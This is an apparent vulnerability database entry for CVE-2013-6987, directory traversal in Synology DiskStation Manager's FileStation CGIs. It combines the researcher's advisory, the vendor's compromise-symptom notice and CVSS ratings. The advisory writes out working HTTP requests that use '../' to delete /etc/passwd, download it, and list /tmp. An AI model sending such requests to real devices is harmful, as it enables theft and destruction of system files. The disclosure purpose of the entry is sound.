ID

VAR-201312-0278

CVE

CVE-2013-6987

TITLE

Synology DiskStation Manager of FileBrowser Directory traversal vulnerability in components

DESCRIPTION

Multiple directory traversal vulnerabilities in the FileBrowser components in Synology DiskStation Manager (DSM) before 4.3-3810 Update 3 allow remote attackers to read, write, and delete arbitrary files via a .. (dot dot) in the (1) path parameter to file_delete.cgi or (2) folder_path parameter to file_share.cgi in webapi/FileStation/; (3) dlink parameter to fbdownload/; or unspecified parameters to (4) html5_upload.cgi, (5) file_download.cgi, (6) file_sharing.cgi, (7) file_MVCP.cgi, or (8) file_rename.cgi in webapi/FileStation/. Synology DiskStation Manager (DSM) of FileBrowser The component contains a directory traversal vulnerability.By a third party .. ( Dot dot ) including webapi/FileStation/ Arbitrary files may be read, written, and deleted via the following parameters in. Synology DiskStation Manager is prone to a multiple directory-traversal vulnerabilities. Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to bypass security restrictions and perform unauthorized actions on system and configuration files in the context of the application. Synology DiskStation Manager 4.3-3810 and prior are vulnerable. The operating system can manage data, documents, photos, music and other information. The vulnerability is caused by (1) the file_delete.cgi script does not filter the 'path' parameter correctly; (2) the file_share in the webapi/FileStation/ directory .cgi script does not filter 'folder_path' parameter correctly; (3) fbdownload/ directory does not filter 'dlink' parameter correctly; (4) html5_upload.cgi, file_download.cgi, file_sharing.cgi, file_MVCP.cgi and The file_rename.cgi script did not properly filter parameters. ************************************************************** Title: Synology DSM multiple directory traversal Version affected: <= 4.3-3810 Vendor: Synology Discovered by: Andrea Fabrizi Email: andrea.fabrizi@gmail.com Web: http://www.andreafabrizi.it Twitter: @andreaf83 Status: patched CVE: 2013-6987 ************************************************************** I'm again here with a Synology DSM vulnerability. Synology DiskStation Manager (DSM) it's a Linux based operating system, used for the DiskStation and RackStation products. This kind of vulnerability allows any authenticated user, even if not administrative, to access, create, delete, modify system and configuration files. The only countermeasure implemented against this vulnerability is the check that the path starts with a valid shared folder, so is enough to put the "../" straight after, to bypass the security check. Vulnerables CGIs: - /webapi/FileStation/html5_upload.cgi - /webapi/FileStation/file_delete.cgi - /webapi/FileStation/file_download.cgi - /webapi/FileStation/file_sharing.cgi - /webapi/FileStation/file_share.cgi - /webapi/FileStation/file_MVCP.cgi - /webapi/FileStation/file_rename.cgi Not tested all the CGI, but I guess that many others are vulnerable, so don't take my list as comprehensive. Following some examples ("test" is a valid folder name): - Delete /etc/passwd =========================================== POST /webapi/FileStation/file_delete.cgi HTTP/1.1 Host: 192.168.56.101:5000 X-SYNO-TOKEN: XXXXXXXX Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 103 Cookie: stay_login=0; id=kjuYI0HvD92m6 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache path=/test/../../etc/passwd&accurate_progress=true&api=SYNO.FileStation.Delete&method=start&version=1 =========================================== - Arbitrary file download: =========================================== GET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1 Host: 192.168.56.101:5000 Connection: keep-alive Authorization: Basic XXXXXXXX =========================================== 2f746573742f2e2e2f2e2e2f6574632f706173737764 -> /test/../../etc/passwd - Remote file list: ========================= POST /webapi/FileStation/file_share.cgi HTTP/1.1 Host: 192.168.56.101:5000 X-SYNO-TOKEN: XXXXXXXX Content-Length: 75 Cookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2 folder_path=/test/../../tmp&api=SYNO.FileStation.List&method=list&version=1 ========================== Timeline: - 05/12/2013: First contact with the vendor - 06/12/2013: Vulnerability details sent to the vendor - 20/12/2013: Patch released by the vendor . http://www.synology.com/en-global/company/news/article/437 February 14, 2014\x97Synology\xae confirmed known security issues (reported as CVE-2013-6955 and CVE-2013-6987) which would cause compromise to file access authority in DSM. An updated DSM version resolving these issues has been released accordingly. The followings are possible symptoms to appear on affected DiskStation and RackStation: Exceptionally high CPU usage detected in Resource Monitor: CPU resource occupied by processes such as dhcp.pid, minerd, synodns, PWNED, PWNEDb, PWNEDg, PWNEDm, or any processes with PWNED in their names Appearance of non-Synology folder: An automatically created shared folder with the name \x93startup\x94, or a non-Synology folder appearing under the path of \x93/root/PWNED\x94 Redirection of the Web Station: \x93Index.php\x94 is redirected to an unexpected page Appearance of non-Synology CGI program: Files with meaningless names exist under the path of \x93/usr/syno/synoman\x94 Appearance of non-Synology script file: Non-Synology script files, such as \x93S99p.sh\x94, appear under the path of \x93/usr/syno/etc/rc.d\x94 If users identify any of above situation, they are strongly encouraged to do the following: For DiskStation or RackStation running on DSM 4.3, please follow the instruction here (http://www.synology.com/en-global/support/faq/348) to REINSTALL DSM 4.3-3827. For DiskStation or RackStation running on DSM 4.0, it\x92s recommended to REINSTALL DSM 4.0-2259 or onward from Synology Download Center. For DiskStation or RackStation running on DSM 4.1 or DSM 4.2, it\x92s recommended to REINSTALL DSM 4.2-3243 or onward from Synology Download Center (http://www.synology.com/en-global/support/download). Confidentiality Impact Complete (There is total information disclosure, resulting in all system files being revealed.) Integrity Impact Complete (There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the entire system being compromised.) Availability Impact Complete (There is a total shutdown of the affected resource. The attacker can render the resource completely unavailable.) Access Complexity Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. ) Authentication Not required (Authentication is not required to exploit the vulnerability.) Gained Access None Vulnerability Type(s) Execute Code This is also known as the /PWNED or /lolz hack

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

path traversal

CONFIGURATIONS

EXPLOIT AVAILABILITY

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Andrea Fabrizi

SOURCES

LAST UPDATE DATE

2024-11-23T21:55:28.945000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE